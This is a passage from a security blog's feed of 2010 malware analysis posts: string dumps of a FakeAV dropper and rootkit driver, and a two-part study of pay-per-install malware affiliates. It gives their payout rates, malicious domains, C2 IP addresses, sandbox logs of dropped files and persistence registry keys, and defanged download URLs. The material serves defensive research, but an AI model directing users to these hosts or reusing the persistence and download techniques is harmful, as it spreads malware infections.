0x00006286	0x00000018	GetPrivateProfileStringA
0x000062A2	0x0000000C	LoadLibraryA
0x000062B2	0x00000012	GetModuleFileNameA
0x000062C8	0x00000012	GetCurrentThreadId
0x000062DE	0x00000007	WinExec
0x000062E9	0x0000000A	loseHandle
0x000062F6	0x0000000C	GetTempPathA
0x00006306	0x0000000D	GetSystemTime
0x00006316	0x0000000B	DeleteFileA
0x00006325	0x0000000B	reateThread
0x00006334	0x00000008	lstrcpyA
0x00006340	0x0000000B	GetFileSize
0x0000634E	0x0000000E	SetFilePointer
0x00006360	0x00000009	lstrcpynA
0x0000636C	0x00000011	GetCurrentProcess
0x00006380	0x00000010	GetCurrentThread
0x00006394	0x0000000B	OpenProcess
0x000063A2	0x00000011	ReadProcessMemory
0x000063B6	0x0000000D	GetVersionExW
0x000063C6	0x00000008	ReadFile
0x000063D2	0x0000000C	GetLastError
0x000063E2	0x0000000C	SetLastError
0x000063F2	0x00000010	GetTempFileNameA
0x00006406	0x0000000E	VirtualProtect
0x00006416	0x0000000C	KERNEL32.dll
0x00006427	0x0000000B	loseDesktop
0x00006436	0x00000009	wsprintfA
0x00006443	0x0000000D	reateDesktopA
0x00006454	0x00000010	GetThreadDesktop
0x00006468	0x00000018	GetWindowThreadProcessId
0x00006484	0x00000010	GetSystemMetrics
0x00006498	0x0000000C	SetWindowPos
0x000064A8	0x0000000E	GetWindowTextA
0x000064BA	0x0000000B	EnumWindows
0x000064C6	0x0000000A	USER32.dll
0x000064D4	0x0000000D	RegCreateKeyA
0x000064E4	0x0000000F	RegDeleteValueA
0x000064F6	0x0000000D	RegEnumValueA
0x00006506	0x0000000B	RegCloseKey
0x00006514	0x00000010	OpenProcessToken
0x00006528	0x0000000F	OpenThreadToken
0x0000653A	0x00000013	GetTokenInformation
0x00006550	0x0000000E	RegSetValueExA
0x00006562	0x00000010	RegQueryValueExA
0x00006576	0x00000015	LookupPrivilegeValueW
0x0000658E	0x0000000B	RegOpenKeyA
0x0000659C	0x00000015	AdjustTokenPrivileges
0x000065B2	0x0000000C	ADVAPI32.dll
0x000065C2	0x00000006	memcpy
0x000065CC	0x00000006	memset
0x000065D6	0x00000007	_chkstk
0x00006612	0x0000000A	NkrDll.dll
0x0000661D	0x0000000A	_Install@0
0x00007000	0x00000040	ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
0x0000C493	0x0000000B	86&amp;lt;&amp;lt;&amp;lt;B&amp;lt;H&amp;lt;N&amp;lt;
0x0000C513	0x0000001F	1 1$1(1,1014181x&amp;gt;|&amp;gt;
0x000110E4	0x00000005	cuvwx
0x000140A0	0x0000000C	kernel32.dll
0x000140AF	0x0000000F	GetCommandLineA
0x000140C1	0x0000000C	GetTempPathA
0x000140D0	0x0000000B	CloseHandle
0x000140DE	0x0000000F	GetStartupInfoA
0x000140F0	0x0000000E	VirtualProtect
0x00014101	0x00000009	FatalExit
0x0001410E	0x0000000A	user32.dll
0x0001411B	0x00000012	IsDlgButtonChecked
0x00014130	0x0000000C	GetUpdateRgn
0x00015032	0x00000009	lpoaw.exe
0x0001503C	0x00000007	Mjexfdm</pre></td></tr></table></div>

<p>pragmad.sys strings:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">0x000001C0	0x00000005	.text
0x000001E7	0x00000007	`.rdata
0x0000020F	0x00000006	@.data
0x00000238	0x00000005	.test
0x00000260	0x00000006	.reloc
0x00000287	0x00000009	Bsecsct10
0x000002B0	0x00000008	nr7rc660
0x000002D8	0x00000005	idata
0x000002FF	0x00000007	@.idata
0x00000328	0x00000005	.rsrc
0x00004110	0x0000001A	PRAGMAcfg.ini
0x0000412C	0x0000000C	PRAGMA
0x0000413C	0x0000000E	\\?\globalroot
0x0000414C	0x0000000A	%s\%s
0x0000415C	0x0000000A	start
0x00004174	0x00000012	imagepath
0x00004190	0x0000000B	file system
0x0000419C	0x0000000A	group
0x000041AC	0x00000010	\\?\globalroot%s
0x000041C0	0x00000054	\registry\machine\software\PRAGMA\injector
0x00004224	0x0000000B	svchost.exe
0x00004230	0x0000000B	PRAGMAc.dll
0x0000423C	0x0000001C	*\KERNEL32.DLL
0x0000425C	0x00000016	*\NTDLL.DLL
0x00004274	0x00000017	NtFlushInstructionCache
0x0000428C	0x0000000E	LoadLibraryExA
0x000042A4	0x00000024	\FileSystem\FltMgr
0x000042CC	0x00000012	*\PRAGMA*
0x000042E0	0x0000001C	*\TEMP\PRAGMA*
0x00004300	0x00000030	*\SYSTEM32\CONFIG\SYSTEM
0x00004334	0x00000034	*\SYSTEM32\CONFIG\SOFTWARE
0x0000436C	0x0000000A	chkdsk.exe
0x00004378	0x00000026	\filesystem\fastfat
0x000043A0	0x00000020	\filesystem\ntfs
0x000043C4	0x0000001A	\driver\tcpip
0x000043E0	0x0000001C	\driver\ftdisk
0x00004400	0x00000018	\driver\disk
0x0000441C	0x0000001A	\driver\atapi
0x00004438	0x0000001E	\driver\volsnap
0x00004458	0x0000001E	\driver\partmgr
0x00004478	0x0000001E	\filesystem\raw
0x00004498	0x00000016	svchost.exe
0x000044B0	0x00000006	System
0x000044B8	0x00000012	ntdll.dll
0x000044CC	0x00000018	kernel32.dll
0x000044E8	0x00000005	.test
0x000044F0	0x00000072	\registry\machine\system\currentcontrolset\services\luafv
0x00004568	0x00000074	\registry\machine\system\currentcontrolset\services\wscsvc
0x000045E8	0x0000000E	modules
0x000045F8	0x00000016	PRAGMAc.dll
0x00004610	0x000000A8	\registry\machine\system\currentcontrolset\enum\root\legacy_PRAGMAd.sys000\control
0x000046C0	0x00000098	\registry\machine\system\currentcontrolset\enum\root\legacy_PRAGMAd.sys000
0x00004760	0x0000008E	\registry\machine\system\currentcontrolset\enum\root\legacy_PRAGMAd.sys
0x000047F8	0x0000002E	\systemroot\system32\%S
0x00004828	0x00000018	KeServiceDescriptorTable
0x00004992	0x00000007	wcsrchr
0x0000499C	0x00000007	wcsncpy
0x000049A6	0x00000014	RtlInitUnicodeString
0x000049BE	0x0000000A	ZwOpenFile
0x000049CC	0x00000007	ZwClose
0x000049D6	0x00000008	_stricmp
0x000049E2	0x00000008	_wcsicmp
0x000049EE	0x00000006	strstr
0x000049F8	0x00000007	strrchr
0x00004A02	0x00000006	strchr
0x00004A0C	0x00000009	_snprintf
0x00004A18	0x00000007	strncpy
0x00004A22	0x00000009	ZwOpenKey
0x00004A2E	0x0000000F	ZwQueryValueKey
0x00004A40	0x0000000A	_snwprintf
0x00004A4E	0x0000000B	ZwCreateKey
0x00004A5C	0x00000013	ZwSetSecurityObject
0x00004A72	0x00000014	RtlCreateRegistryKey
0x00004A8A	0x00000015	RtlWriteRegistryValue
0x00004AA2	0x00000017	ObReferenceObjectByName
0x00004ABC	0x00000012	IoDriverObjectType
0x00004AD2	0x00000014	ObfDereferenceObject
0x00004AEB	0x00000010	xFreePoolWithTag
0x00004AFE	0x00000017	ZwAllocateVirtualMemory
0x00004B18	0x00000007	sprintf
0x00004B22	0x00000012	KeGetCurrentThread
0x00004B38	0x00000016	KeDelayExecutionThread
0x00004B52	0x00000013	IoGetCurrentProcess
0x00004B68	0x00000017	FsRtlIsNameInExpression
0x00004B82	0x0000001C	MmMapLockedPagesSpecifyCache
0x00004BA2	0x00000015	RtlEqualUnicodeString
0x00004BBA	0x00000016	IoQueryFileInformation
0x00004BD4	0x00000010	IoCancelFileOpen
0x00004BE8	0x00000008	swprintf
0x00004BF5	0x0000000D	xAllocatePool
0x00004C06	0x00000012	IofCompleteRequest
0x00004C1C	0x0000000D	IofCallDriver
0x00004C2C	0x0000000E	ZwEnumerateKey
0x00004C3E	0x00000017	ZwFlushInstructionCache
0x00004C58	0x0000000D	ZwQueryObject
0x00004C68	0x00000010	RtlCompareMemory
0x00004C7C	0x0000001A	PsLookupProcessByProcessId
0x00004C9A	0x00000014	KeStackAttachProcess
0x00004CB2	0x00000016	KeUnstackDetachProcess
0x00004CCC	0x00000010	RtlImageNtHeader
0x00004CE0	0x0000000C	ZwCreateFile
0x00004CF0	0x0000000B	ZwWriteFile
0x00004CFE	0x00000018	PsLookupThreadByThreadId
0x00004D1A	0x00000018	KeServiceDescriptorTable
0x00004D36	0x00000012	ObfReferenceObject
0x00004D4C	0x00000015	ObMakeTemporaryObject
0x00004D64	0x0000001B	PsSetLoadImageNotifyRoutine
0x00004D83	0x0000000E	xQueueWorkItem
0x00004D92	0x0000000C	ntoskrnl.exe
0x00004DA2	0x0000000B	ZwDeleteKey
0x00004DB0	0x00000019	ZwQueryInformationProcess
0x00004DCC	0x00000018	ZwQuerySystemInformation
0x00004DE8	0x0000001C	RtlImageDirectoryEntryToData
0x00004E08	0x0000000F	KeInitializeApc
0x00004E1A	0x00000010	KeInsertQueueApc
0x00004E2E	0x0000000F	ZwCreateSection
0x00004E40	0x00000012	ZwMapViewOfSection
0x00004E56	0x00000014	ZwUnmapViewOfSection
0x00004E6F	0x0000000A	fLowerIrql
0x00004E7D	0x00000014	eRaiseIrqlToDpcLevel
0x00004E92	0x00000007	HAL.dll
0x00004E9C	0x00000006	memcpy
0x00004EA6	0x00000006	memset
0x000091B8	0x00000028	\systemroot\PRAGMAtisvbvxtng\PRAGMAd.sys
0x000092C0	0x00000010	PRAGMAtisvbvxtng
0x000093C8	0x0000000B	PRAGMAd.sys
0x000094D0	0x00000050	\systemroot\PRAGMAtisvbvxtng\PRAGMAd.sys
0x000096D8	0x00000020	PRAGMAtisvbvxtng
0x000098E0	0x00000016	PRAGMAd.sys
0x00009CF8	0x00000090	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PRAGMAtisvbvxtng\modules
0x00009F00	0x00000080	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PRAGMAtisvbvxtng
0x0000A108	0x00000028	\systemroot\PRAGMAtisvbvxtng\PRAGMAc.dll
0x0000A210	0x00000050	\systemroot\PRAGMAtisvbvxtng\PRAGMAc.dll
0x0000B1D0	0x00000005	.text
0x0000B1F7	0x00000009	`.datatxt
0x0000B21F	0x00000007	@.rdata
0x0000B247	0x00000007	@.ldata
0x0000B26F	0x00000007	@.rdsec
0x0000B298	0x00000005	.rsrc
0x0000B2BF	0x00000007	@.sdata
0x0000B2E7	0x00000007	@.mdata
0x0000B30F	0x00000007	@.kdata
0x0000B337	0x00000007	@.edata
0x0000FB0D	0x00000006	9^_t\`
0x000124A0	0x0000000C	kernel32.dll
0x000124AF	0x0000000F	GetCommandLineA
0x000124C1	0x0000000C	GetTempPathA
0x000124D0	0x0000000B	CloseHandle
0x000124DE	0x0000000F	GetStartupInfoA
0x000124F0	0x0000000E	VirtualProtect
0x00012501	0x00000009	FatalExit
0x0001250E	0x0000000A	user32.dll
0x0001251B	0x00000012	IsDlgButtonChecked
0x00012530	0x0000000C	GetUpdateRgn
0x00012832	0x0000000A	cseteo.exe
0x0001283D	0x00000007	Caokyjf
0x00015E60	0x00000005	.text
0x00015E87	0x00000007	`.rdata
0x00015EAF	0x00000006	@.data
0x00015ED8	0x00000005	.test
0x00015F00	0x00000006	.reloc
0x0001F3C9	0x00000005	}GijY</pre></td></tr></table></div>

<p>So, in conclusion: FakeAVs often download other nastiness. Only use reputable applications, and only download them from their creators&#8217; websites.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.novirusthanks.org/2010/07/fakeav-analysis-defense-center/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Pay-Per-Install Analysis &#8211; Part  Two</title>
		<link>http://blog.novirusthanks.org/2010/06/pay-per-install-analysis-part-two/</link>
		<comments>http://blog.novirusthanks.org/2010/06/pay-per-install-analysis-part-two/#comments</comments>
		<pubDate>Wed, 30 Jun 2010 12:31:35 +0000</pubDate>
		<dc:creator></dc:creator>
				<category><![CDATA[Malware Analysis]]></category>
		<category><![CDATA[Security News]]></category>

		<guid isPermaLink="false">http://blog.novirusthanks.org/?p=2724</guid>
		<description><![CDATA[WorldPays &#8211; Euro-Pays &#8211; SummerCash &#160; Next on the list we have 3 companies, who are distributing the same executable, so it&#8217;s safe to assume either they are all resellers for a single company, or 2 of them are reselling for the other. &#160; &#160; &#160; &#160; From the above images we can extract some [...]]]></description>
			<content:encoded><![CDATA[<p><strong><u>WorldPays &#8211; Euro-Pays &#8211; SummerCash</u></strong></p>
<p>&nbsp;</p>
<p>Next on the list we have 3 companies who are distributing the same executable, so it&#8217;s safe to assume that either they are all resellers for a single company, or 2 of them are reselling for the other.</p>
<p>&nbsp;</p>
<p><a href="http://blog.novirusthanks.org/wp-content/uploads/pay-per-installs-analysis-part-two-01.png"><img src="http://blog.novirusthanks.org/wp-content/uploads/pay-per-installs-analysis-part-two-01.png" alt="Image" width="530" height="250" /></a></p>
<p>&nbsp;</p>
<p><a href="http://blog.novirusthanks.org/wp-content/uploads/pay-per-installs-analysis-part-two-02.png"><img src="http://blog.novirusthanks.org/wp-content/uploads/pay-per-installs-analysis-part-two-02.png" alt="Image" width="530" height="250" /></a></p>
<p>&nbsp;</p>
<p><a href="http://blog.novirusthanks.org/wp-content/uploads/pay-per-installs-analysis-part-two-03.png"><img src="http://blog.novirusthanks.org/wp-content/uploads/pay-per-installs-analysis-part-two-03.png" alt="Image" width="530" height="250" /></a></p>
<p>&nbsp;</p>
<p>From the above images we can extract some dangerous domains used for spreading the payloads:</p>
<blockquote><p>
<a href="http://www.urlvoid.com/scan/super-cool-tube.com" title="View URLVoid Report" target="blank">super-cool-tube.com</a><br />
<a href="http://www.urlvoid.com/scan/real-antivir-4pc.com" title="View URLVoid Report" target="blank">real-antivir-4pc.com</a><br />
<a href="http://www.urlvoid.com/scan/free-crack-service.com" title="View URLVoid Report" target="blank">free-crack-service.com</a><br />
<a href="http://www.urlvoid.com/scan/great-tube-fest.com" title="View URLVoid Report" target="blank">great-tube-fest.com</a><br />
<a href="http://www.urlvoid.com/scan/hotcelebsnow.com" title="View URLVoid Report" target="blank">hotcelebsnow.com</a><br />
<a href="http://www.urlvoid.com/scan/datamediaworld.com" title="View URLVoid Report" target="blank">datamediaworld.com</a><br />
<a href="http://www.urlvoid.com/scan/anti-vir-protect.com" title="View URLVoid Report" target="blank">anti-vir-protect.com</a>
</p></blockquote>
<p>&nbsp;</p>
<p>Euro-Pays rates per install:</p>
<p>&nbsp;</p>
<pre>Rates
GB	0.15$
DE	0.14$
GR	0.07$
ES	0.07$
AT	0.07$
PT	0.01$
BE	0.07$
IT	0.07$
CH	0.14$
DK	0.14$
FR	0.14$
SE	0.14$
NL	0.14$
NO	0.14$</pre>
<p>&nbsp;</p>
<p>SummerCash rates per install:</p>
<p>&nbsp;</p>
<pre>0	0.01
US	0.4
GB	0.32
CA	0.16
AU	0.16
NO	0.12
DK	0.12
NZ	0.12
SE	0.12
PR	0.12
DE	0.12
ES	0.1
IT	0.1
FR	0.1
CH	0.08
BE	0.08
NL	0.08
AT	0.08
FI	0.08
ZA	0.08
IS	0.08
IE	0.08
JP	0.03
SG	0.03
CY	0.03
HK	0.03
MU	0.03
GR	0.03
IL	0.03
</pre>
<p>&nbsp;</p>
<p>There was no rates list for WorldPays. As you can see there is quite a difference between the 2 companies: SummerCash pays double what Euro-Pays does for some countries, for the same executable.</p>
<p>&nbsp;</p>
<p>Instead of posting sandbox reports for all 3 companies I will just show you the similarities.</p>
<p>&nbsp;</p>
<p>All make connections to:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">Internet connection: C:\Documents and Settings\Administrator\Desktop\video-plugin.45311.exe Connects to &quot;216.240.146.119&quot; on port 80 (TCP - HTTP).
Internet connection: C:\Documents and Settings\Administrator\Desktop\video-plugin.45311.exe Connects to &quot;62.122.75.42&quot; on port 80 (TCP - HTTP).
Internet connection: C:\Documents and Settings\Administrator\Desktop\video-plugin.45311.exe Connects to &quot;64.20.35.3&quot; on port 80 (TCP - HTTP).
Internet connection: C:\Documents and Settings\Administrator\Desktop\video-plugin.45311.exe Connects to &quot;69.10.35.253&quot; on port 80 (TCP - HTTP).
Internet connection: C:\WINDOWS\Xmitoa.exe Connects to &quot;67.210.170.183&quot; on port 80 (TCP - HTTP).
Internet connection: C:\Documents and Settings\Administrator\Local Settings\Temp\Xtl.exe Connects to &quot;64.191.82.25&quot; on port 80 (TCP - HTTP).</pre></td></tr></table></div>

<p>Below are the IPVoid.com scan reports for the above IP addresses:</p>
<blockquote><p>
<a href="http://www.ipvoid.com/scan/216.240.146.119" title="View report" target="blank">216.240.146.119</a><br />
<a href="http://www.ipvoid.com/scan/62.122.75.42" title="View report" target="blank">62.122.75.42</a><br />
<a href="http://www.ipvoid.com/scan/64.20.35.3" title="View report" target="blank">64.20.35.3</a><br />
<a href="http://www.ipvoid.com/scan/69.10.35.253" title="View report" target="blank">69.10.35.253</a><br />
<a href="http://www.ipvoid.com/scan/67.210.170.183" title="View report" target="blank">67.210.170.183</a><br />
<a href="http://www.ipvoid.com/scan/64.191.82.25" title="View report" target="blank">64.191.82.25</a>
</p></blockquote>
<p>All create these files:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\Xtj.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\Xtk.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\Xtl.exe</pre></td></tr></table></div>

<p>All add the same startup key:</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">Defined registry AutoStart location added or modified: user\current\software\Microsoft\Windows\CurrentVersion\Run\M5T8QL3YW3 = C:\Documents and Settings\Administrator\Local Settings\Temp\Xtl.exe</pre></td></tr></table></div>

<p>To be continued&#8230;</p>
<p>&nbsp;</p>
<p><a href="http://blog.novirusthanks.org/2010/06/pay-per-install/">Pay-Per-Install Analysis &#8211; Part One</a></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.novirusthanks.org/2010/06/pay-per-install-analysis-part-two/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Pay-Per-Install Analysis &#8211; Part One</title>
		<link>http://blog.novirusthanks.org/2010/06/pay-per-install/</link>
		<comments>http://blog.novirusthanks.org/2010/06/pay-per-install/#comments</comments>
		<pubDate>Tue, 22 Jun 2010 13:58:27 +0000</pubDate>
		<dc:creator></dc:creator>
				<category><![CDATA[Malware Analysis]]></category>
		<category><![CDATA[Security News]]></category>
		<category><![CDATA[earning4u]]></category>
		<category><![CDATA[pay per install]]></category>
		<category><![CDATA[ppi]]></category>
		<category><![CDATA[tdl]]></category>
		<category><![CDATA[TDSS]]></category>
		<category><![CDATA[voguecash]]></category>

		<guid isPermaLink="false">http://blog.novirusthanks.org/?p=2637</guid>
		<description><![CDATA[What is Pay-Per-Install(PPI)? &#160; Pay-Per-Install is a system where people get paid for installation of software, 9 times out of 10 without the knowledge of the end-user. The amount the affiliate gets paid depends which country the victim is in, countries like USA normally get the highest rates, while other less-known countries get little or [...]]]></description>
			<content:encoded><![CDATA[<p><strong>What is Pay-Per-Install(PPI)?</strong></p>
<p>&nbsp;</p>
<p>Pay-Per-Install is a system where people get paid for the installation of software, 9 times out of 10 without the knowledge of the end-user. The amount the affiliate gets paid depends on which country the victim is in: countries like the USA normally get the highest rates, while other less-known countries get little or nothing. Some companies have existed since 2004 and even today still carry on pumping out various malware types. Banking trojans, downloaders, spam-bots, backdoors, proxy-bots, rootkits, any &#8220;software&#8221; will do with these guys.</p>
<p>&nbsp;</p>
<p>I managed to gain access to some of these companies, some of which aren&#8217;t publicly known and are invite-only.</p>
<p>&nbsp;</p>
<p><strong><span style="text-decoration: underline">Earning4U</span></strong></p>
<p>&nbsp;</p>
<p>This is a company that has existed for a long time. It was previously called InstallsCash, and before that IframeDollars. IframeDollars was a known associate of the <a href="http://en.wikipedia.org/wiki/Russian_Business_Network" target="_blank">RBN</a>.</p>
<p>&nbsp;</p>
<p>Here you can see the stats panel of Earning4U: the date, how many downloads they had, a table of the countries they&#8217;ve installed in, how many unique installs they&#8217;ve got (unique installs are installs from a single IP/PC; multiple installations on the same PC won&#8217;t count), and the amount of money these installs have earned them.</p>
<p>&nbsp;</p>
<p><a href="http://blog.novirusthanks.org/wp-content/uploads/pay-per-install-part1-earning4u.png"><img src="http://blog.novirusthanks.org/wp-content/uploads/pay-per-install-part1-earning4u.png" alt="Image" width="530"></a></p>
<p>&nbsp;</p>
<p>Another bad thing is that the loader is updated often to avoid antivirus detections; it looks like they update the main EXE loader every 3 or 4 days.</p>
<p>&nbsp;</p>
<p>This is how much Earning4U pays for 1000 unique installs per country (US dollars).</p>
<blockquote><p>
United States 180<br />
United Kingdom 110<br />
Netherlands 30<br />
France 30<br />
Poland 20<br />
Italy 65<br />
Germany 30<br />
Spain 30<br />
Australia 55<br />
Greece 30<br />
Other 20<br />
Asia 8
</p></blockquote>
<p>This is a list of strings from the unpacked executable provided by Earning4U.</p>
<blockquote><p>
0x000001D0    0x00000005    .text<br />
0x000001F7    0x00000006    `.data<br />
0x00000220    0x00000008    .textbss<br />
0x00000248    0x00000006    .rdata<br />
0x0000026F    0x00000006    @.rsrc<br />
0x00000297    0x00000007    @.debug<br />
0x000002B0    0x00000007    /c del<br />
0x000002B8    0x00000005    COMS@<br />
0x000002BF    0x00000039    @%svzdlfahpxe.php?adv=adv510&amp;code1=%s&amp;code2=%s&amp;id=%d&amp;p=%s<br />
0x00000300    0x0000000A    %senrl.exe<br />
0x0000030C    0x00000017    %skksahc.php?adv=adv510<br />
0x00000324    0x0000000B    %sdltfh.exe<br />
0x00000330    0x00000016    %siickf.php?adv=adv510<br />
0x00000348    0x0000000E    %samycwrkf.exe<br />
0x00000358    0x00000019    %sjjaiqxsq.php?adv=adv510<br />
0x00000374    0x0000000E    %shhyawghp.exe<br />
0x00000384    0x00000019    %sjwrlgbvd.php?adv=adv510<br />
0x000003A0    0x0000000C    %sgwetlq.exe<br />
0x000003B0    0x0000001B    %swzdytaicxe.php?adv=adv510<br />
0x000003CC    0x0000000C    %smvjjsb.exe<br />
0x000003DC    0x0000001B    %sgkbjdlwqlt.php?adv=adv510<br />
0x000003F8    0x00000008    %seetj.e<br />
0x000010A8    0x00000006     &gt; nul<br />
0x000010B0    0x00000007    /c del<br />
0x000010B8    0x00000007    COMSPEC<br />
0x000010C0    0x00000038    %svzdlfahpxe.php?adv=adv510&amp;code1=%s&amp;code2=%s&amp;id=%d&amp;p=%s<br />
0x00001100    0x0000000A    %senrl.exe<br />
0x0000110C    0x00000017    %skksahc.php?adv=adv510<br />
0x00001129    0x00000006    fh.exe<br />
0x00001130    0x00000016    %siickf.php?adv=adv510<br />
0x00001148    0x0000000E    %samycwrkf.exe<br />
0x00001158    0x00000019    %sjjaiqxsq.php?adv=adv510<br />
0x00001174    0x0000000E    %shhyawghp.exe<br />
0x00001184    0x00000019    %sjwrlgbvd.php?adv=adv510<br />
0x000011A0    0x0000000C    %sgwetlq.exe<br />
0x000011B0    0x0000001B    %swzdytaicxe.php?adv=adv510<br />
0x000011CC    0x0000000C    %smvjjsb.exe<br />
0x000011DC    0x0000001B    %sgkbjdlwqlt.php?adv=adv510<br />
0x000011F8    0x0000000A    %seetj.exe<br />
0x00001204    0x00000016    %sgxbjd.php?adv=adv510<br />
0x0000121C    0x0000000D    %sggmohsv.exe<br />
0x0000122C    0x0000001B    %suiptnmgovj.php?adv=adv510<br />
0x00001248    0x0000000A    %sjuih.exe<br />
0x00001254    0x00000017    %sggbrzx.php?adv=adv510<br />
0x0000126C    0x0000000D    %silwxubb.exe<br />
0x0000127C    0x00000017    %sffmhcw.php?adv=adv510<br />
0x00001294    0x0000000A    %swfpk.exe<br />
0x000012A0    0x00000019    %skksaupwr.php?adv=adv510<br />
0x000012C4    0x00000018    %sptxfnhp.php?adv=adv510<br />
0x000012E0    0x00000021    hxxp://bgroundplatt.com/yulgbvqk/<br />
0x00001304    0x0000001C    hxxp://agrofee.com/yulgbvqk/<br />
0x00001328    0x00000005    ver54<br />
0x00001F8F    0x00000012    nternetCloseHandle<br />
0x00001FA5    0x0000000F    nternetReadFile<br />
0x00001FB9    0x0000000D    ttpQueryInfoA<br />
0x00001FCA    0x00000012    InternetSetOptionA<br />
0x00001FE1    0x0000000F    nternetOpenUrlA<br />
0x00001FF5    0x0000000C    nternetOpenA<br />
0x00002002    0x0000000B    WININET.dll<br />
0x00002011    0x00000014    btainUserAgentString<br />
0x00002026    0x0000000A    urlmon.dll<br />
0x00002035    0x0000000A    xitProcess<br />
0x00002042    0x00000011    SetThreadPriority<br />
0x00002056    0x00000010    GetCurrentThread<br />
0x0000206A    0x00000011    GetCurrentProcess<br />
0x0000207E    0x00000010    SetPriorityClass<br />
0x00002092    0x00000008    lstrcatA<br />
0x0000209E    0x00000008    lstrcpyA<br />
0x000020AA    0x00000017    GetEnvironmentVariableA<br />
0x000020C4    0x00000011    GetShortPathNameA<br />
0x000020D8    0x00000012    GetModuleFileNameA<br />
0x000020EE    0x00000016    WaitForMultipleObjects<br />
0x00002108    0x0000000D    GetSystemTime<br />
0x00002118    0x0000000B    GetFileSize<br />
0x00002127    0x0000000A    reateFileA<br />
0x00002134    0x0000000B    CloseHandle<br />
0x00002142    0x00000013    WaitForSingleObject<br />
0x00002159    0x0000000B    reateThread<br />
0x00002168    0x00000016    GetSystemDefaultLangID<br />
0x00002182    0x0000000C    GetTempPathA<br />
0x00002192    0x00000015    GetVolumeInformationA<br />
0x000021AB    0x00000009    xitThread<br />
0x000021B9    0x0000000D    reateProcessA<br />
0x000021CA    0x00000009    WriteFile<br />
0x000021D4    0x0000000C    KERNEL32.dll<br />
0x000021E4    0x00000009    wsprintfA<br />
0x000021EE    0x0000000A    USER32.dll<br />
0x000021FC    0x00000010    DirectDrawCreate<br />
0x0000220E    0x00000009    DDRAW.dll<br />
0x0000221B    0x0000000D    HChangeNotify<br />
0x0000222D    0x0000000E    hellExecuteExA<br />
0x0000223C    0x0000000B    SHELL32.dll<br />
0x00003B71    0x00000007    &amp;y%ZgXJ<br />
0x00008241    0x00000019    qvSHCreateShellFolderView<br />
0x0000825B    0x0000000B    SHELL32.dll<br />
0x00008269    0x0000000B    CloseHandle<br />
0x00008277    0x0000000C    LoadLibraryA<br />
0x00008287    0x00000017    QueryPerformanceCounter<br />
0x000082A0    0x0000000C    qExitProcess<br />
0x000082AF    0x0000000C    VirtualAlloc<br />
0x000082BD    0x0000000C    KERNEL32.dll<br />
0x00009558    0x0000001E    VS_VERSION_INFO<br />
0x000095B4    0x0000001C    StringFileInfo<br />
0x000095D8    0x00000010    040904B0<br />
0x000095F0    0x00000016    CompanyName<br />
0x0000961C    0x0000001E    FileDescription<br />
0x0000963E    0x0000001E    Kernel Veryfier<br />
0x00009664    0x00000016    FileVersion<br />
0x0000967E    0x0000001A    2.4.4587.1000<br />
0x000096A0    0x00000018    InternalName<br />
0x000096CC    0x0000001C    LegalCopyright<br />
0x000096EA    0x00000010    eSXi (c)<br />
0x00009704    0x00000020    OriginalFilename<br />
0x00009726    0x00000010    KVFR.EXE<br />
0x00009740    0x00000016    ProductName<br />
0x0000975A    0x0000001E    Kernel Veryfier<br />
0x00009780    0x0000001C    ProductVersion<br />
0x0000979E    0x0000001A    2.4.4587.1000<br />
0x000097C0    0x00000016    VarFileInfo<br />
0x000097E0    0x00000016    Translation
</p></blockquote>
<p>&nbsp;</p>
<p>One interesting thing to note is that the PHP scripts won&#8217;t let you download the file unless &#8220;ver54&#8221; is appended to the end of the user agent, which is obtained using the <a href="http://msdn.microsoft.com/en-us/library/ms775114%28VS.85%29.aspx" target="blank">ObtainUserAgentStringA</a> API.</p>
<p>&nbsp;</p>
<p>This is a brief sandbox analysis of the executable.</p>

<div class="wp_syntax"><table><tr><td class="code"><pre class="text" style="font-family:monospace;">Created Files:
&nbsp;
C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\553z8yxt.default\bookmarkbackups\bookmarks-2010-06-02.json
C:\Documents and Settings\Administrator\Local Settings\Temp\5d0a4d64.tmp
C:\WINDOWS\$NtUninstallMTF1011$\apUninstall.exe
C:\WINDOWS\riap60.dll
C:\WINDOWS\system32\arrbofhrxumbzdpr.dll
C:\WINDOWS\system32\bbayi.exe
C:\WINDOWS\system32\kbayi.dll
C:\WINDOWS\system32\nywpppobpt.exe
C:\WINDOWS\system32\obayi.dll
C:\Documents and Settings\Administrator\Local Settings\Application Data\kbwcodnrj\pumdfehtssd.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\jghrjtyu.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\juih.exe
C:\Documents and Settings\Administrator\Local Settings\Temp\mvjjsb.exe
C:\Program Files\$NtUninstallWTF1012$\elUninstall.exe
C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\553z8yxt.default\localstore.rdf
C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\553z8yxt.default\pluginreg.dat
&nbsp;
Registry Startup Entries:
&nbsp;
HKLM\software\microsoft\Windows\CurrentVersion\Run\iriuusum:
C:\Documents and Settings\Administrator\Local Settings\Application Data\kbwcodnrj\pumdfehtssd.exe
HKLM\software\microsoft\Windows\CurrentVersion\Run\MChk:
C:\WINDOWS\system32\bbayi.exe
HKLM\software\microsoft\Windows\CurrentVersion\Run\odjzobioswzpnm:
C:\WINDOWS\System32\regsvr32.exe /s &quot;C:\WINDOWS\system32\arrbofhrxumbzdpr.dll&quot;
HKLM\software\microsoft\Windows\CurrentVersion\Run\skb:
rundll32 &quot;obayi.dll&quot;,,Run
HKLM\system\CurrentControlSet\Services\1519672323\ImagePath:
C:\WINDOWS\system32\drivers\1519672323.sys
